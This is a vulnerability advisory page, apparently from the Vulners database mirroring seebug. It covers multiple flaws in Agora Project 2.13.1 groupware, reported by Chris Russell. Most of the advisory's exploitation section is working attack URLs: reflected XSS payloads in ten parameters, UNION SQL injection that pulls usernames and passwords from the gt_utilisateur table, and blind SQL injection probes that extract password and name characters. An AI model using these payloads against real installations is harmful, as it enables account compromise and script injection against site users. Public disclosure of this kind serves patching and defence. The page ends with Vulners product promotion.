Lucene search
K

agora project 2.13.1 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 22 Views

Agora Project 2.13.1 multiple security vulnerabilities including XSS, SQLi, BSQLi. PHP/MySQL based groupware

Code

                                                ###################################################################
Agora Project 2.13.1 Multiple Vulnerabilities
###################################################################
 
Release Date Bug.          15-06-2012
Vendor Notification Date.  Never
Product.                   Agora project
Affected versions.         2.13.1 and less
Type.                      No Commercial
Attack Vector.             XSS, SQLi, BSQLi
Solution Status.           unpublished
CVE reference.             Not yet assigned
Download                   http://www.agora-project.net/divers/download.php
Demo			   http://www.agora-project.net/demo/
 
I. BACKGROUND
 
Agora-Project is an intuitive groupware under GPL (Based on PHP/MySQL). 
It contains many modules: File Manager (with versioning), Calendars (with resource calendars),
Task Manager, Bookmark manager, Contacts, News, Forum, Instant Messaging, etc.
 
II. DESCRIPTION
 
vulnerabilities are XSS, SQLi, BSQLi
 
 
III.  EXPLOITATION
 
	XSS 
	192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur"><script>alert('xss')</script>
	192.168.0.1/module_agenda/evenement.php?id_evenement="><script>alert('xss')</script>
	192.168.0.1/module_contact/contact.php?id_contact="><script>alert('xss')</script>
	192.168.0.1/module_contact/index.php?id_dossier="><script>alert('xss')</script>
	192.168.0.1/module_tache/index.php?id_dossier="><script>alert('xss')</script>
	192.168.0.1/module_agenda/index.php?printmode="><script>alert('xss')</script>
	192.168.0.1/module_lien/index.php?id_dossier="><script>alert('xss')</script>
	192.168.0.1/module_forum/index.php?theme="><script>alert('xss')</script>
	192.168.0.1/module_fichier/index.php?id_dossier="><script>alert('xss')</script>
	192.168.0.1/module_tableau_bord/index.php?tdb_periode="><script>alert('xss')</script>

	SQLi
	To exploit minimum visit to "public" space
	192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
	192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select pass FROM gt_utilisateur WHERE 1 AND '1'='1
	
	BSQLi
	To exploit minimum visit to "public" space
	192.168.0.1/module_tache/tache.php?id_tache=1'+and+substring(@@version,1,1)='5
	192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+1+from+gt_utilisateur+limit+0,1)='1

	192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+substring(concat(1,pass),1,1)+from+gt_utilisateur+limit+0,1)='1
	192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+substring(concat(1,nom),1,1)+from+gt_utilisateur+limit+0,1)='1

	192.168.0.1/module_tache/tache.php?id_tache=1'and ascii(substring((SELECT nom from gt_utilisateur limit 0,1),1,1))>'0'>'0
	192.168.0.1/module_tache/tache.php?id_tache=1'+and ascii(substring((SELECT nom from gt_utilisateur limit 0,1),1,1))='110
	...

	


 
Discovered by.
Chris Russell
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation